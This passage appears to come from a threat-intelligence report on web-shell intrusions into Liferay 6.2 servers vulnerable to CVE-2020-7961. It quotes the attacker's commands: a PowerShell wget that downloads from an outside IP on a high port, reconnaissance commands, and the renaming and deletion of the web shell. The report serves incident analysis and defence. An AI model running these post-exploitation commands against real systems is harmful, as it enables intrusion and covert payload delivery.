Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).
Incident # 2
Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.
Our analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don’t have information as to what was downloaded since the URL was already dead by the time of analysis.
“C:WindowsSystem32cmd.exe” /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK
The following commands were executed in order to gather basic system information:
cmd.exe /c ipconfig cmd.exe /c dir “c:windowssystem32cmd.exe” /c ping -n 1 google.com “c:windowssystem32cmd.exe” /c whoami
The web shell was then copied and the original entry deleted using the following commands:
cmd.exe /c ren C:inetpubwwwrootaspnet_clienterrorFF.aspx.req errorFF.aspx “c:windowssystem32cmd.exe” /c del
Read the article